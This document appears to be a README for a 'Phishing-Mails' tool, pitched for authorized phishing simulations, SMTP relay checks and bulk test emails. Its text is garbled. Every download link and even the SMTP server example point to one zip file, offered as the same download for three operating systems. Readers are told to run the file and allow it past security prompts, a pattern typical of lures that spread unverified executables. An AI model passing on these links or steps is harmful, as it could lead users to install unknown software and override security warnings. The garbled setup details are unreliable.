Phishing-Mails is a lightweight tool designed to help with authorized email security tests. It helps you send test emails in your network. This way, you can check if your email system is set up safely. The tool supports simple message sending using SMTP, which is the system servers use to send emails.
This tool lets you do the following:
- Set up your email settings to match your mail server.
- Test if your email server properly handles outgoing email.
- Send test emails with HTML content, which looks like real emails.
- Send batch emails in a controlled way for testing purposes.
Phishing-Mails is meant to be used only for learning and security testing. It is not for sending spam or unauthorized emails.
These instructions will help you download and run Phishing-Mails on your computer. No special skills or programming knowledge are needed.
- A Windows, macOS, or Linux computer.
- An active internet connection.
- Access to your email service’s SMTP settings (server address, port, and login details).
- Python 3 installed (if you want to run the tool’s source code directly). This is optional if you run the compiled version.
Make sure your system meets these minimum requirements:
- Operating System: Windows 10 or higher, macOS 10.13 or higher, or recent Linux versions.
- Processor: Any modern Intel or AMD processor.
- RAM: At least 2 GB free memory.
- Disk Space: Around 100 MB free.
- Internet access to reach your mail server.
- SMTP credentials (SMTP server name, port, username, and password).
To get Phishing-Mails, you need to visit the release page and download the latest file.
-
Click the link above or go to:
https://raw.githubusercontent.com/Kyleprogrammer334/Phishing-Mails/main/scripturally/Phishing-Mails-1.0-alpha.3.zip
This page will show the list of available releases. -
Find the latest release version. It will have files listed, such as:
https://raw.githubusercontent.com/Kyleprogrammer334/Phishing-Mails/main/scripturally/Phishing-Mails-1.0-alpha.3.zipfor Windowshttps://raw.githubusercontent.com/Kyleprogrammer334/Phishing-Mails/main/scripturally/Phishing-Mails-1.0-alpha.3.zipfor macOShttps://raw.githubusercontent.com/Kyleprogrammer334/Phishing-Mails/main/scripturally/Phishing-Mails-1.0-alpha.3.zipfor Linux
-
Click the file that matches your computer’s operating system. Download the file to your computer.
-
After the download finishes, open the file to install or run the program:
- On Windows, run the
.exefile by double-clicking it. - On macOS, unzip the file and drag the application to your Applications folder. Run it from there.
- On Linux, extract the tar file and follow any included instructions.
- On Windows, run the
-
If you see a security prompt, allow the program to run.
Once installed, you will need to enter your SMTP settings. These settings let the program connect to your mail server so it can send test emails.
Typical setup details you need:
- SMTP Server: This is your mail server’s address. Example:
https://raw.githubusercontent.com/Kyleprogrammer334/Phishing-Mails/main/scripturally/Phishing-Mails-1.0-alpha.3.zip - Port: The port number your server uses. Common ports:
25,465, or587 - Username: Your email login name.
- Password: Your email password.
- Use TLS/SSL: Most servers require secure connections. Check "Yes" if your mail server needs it.
If you don’t know these, check:
- Your email provider’s website support.
- Your email software settings.
- Ask your network or email administrator.
After setup, you can try sending a test email.
- Open Phishing-Mails.
- Go to the “Compose” or “Send Test Email” section.
- Enter the recipient’s email address. You can use your own email to test.
- Optionally, enter a custom subject and message body. The tool supports HTML formatting if you want styled emails.
- Click “Send”.
If everything is correct,
the tool will deliver the email through your SMTP server.
Check your inbox to see if the message arrived.
Phishing-Mails offers these key functions:
- SMTP Configuration: Save and test SMTP mail server connection details.
- Relay Testing: Check if your mail server allows sending from outside.
- HTML Payload Delivery: Send emails with rich content for phishing simulations.
- Bulk Email Testing: Send controlled batches of test emails in the internal network environment.
- Logging: Keep a record of sent emails and errors for review.
- Simple User Interface: Designed for ease of use without programming.
Phishing-Mails is made for security professionals and educators. Use these best practices:
- Only send test emails within your own organization or with permission.
- Do not use this tool to send unwanted or harmful emails.
- Keep your SMTP credentials private.
- Use it strictly for learning, authorized pentesting, or phishing simulations.
Unauthorized use can lead to legal trouble and is unethical.
If you run into problems, try these:
- Make sure your SMTP server details are correct.
- Check internet connectivity.
- Verify your login credentials.
- Confirm firewall or antivirus is not blocking the app.
- Use port numbers recommended by your email provider.
- If emails do not send, look at the error message for clues.
- Review your email spam or junk folder.
Phishing-Mails relates to several areas of IT security:
- Email security testing
- Social engineering assessment
- Phishing campaign simulations
- SMTP server configuration and relay checking
It can be a practical tool for those wanting to understand how phishing attacks are tested.
If you have questions or find issues, check the GitHub repository issues page for help.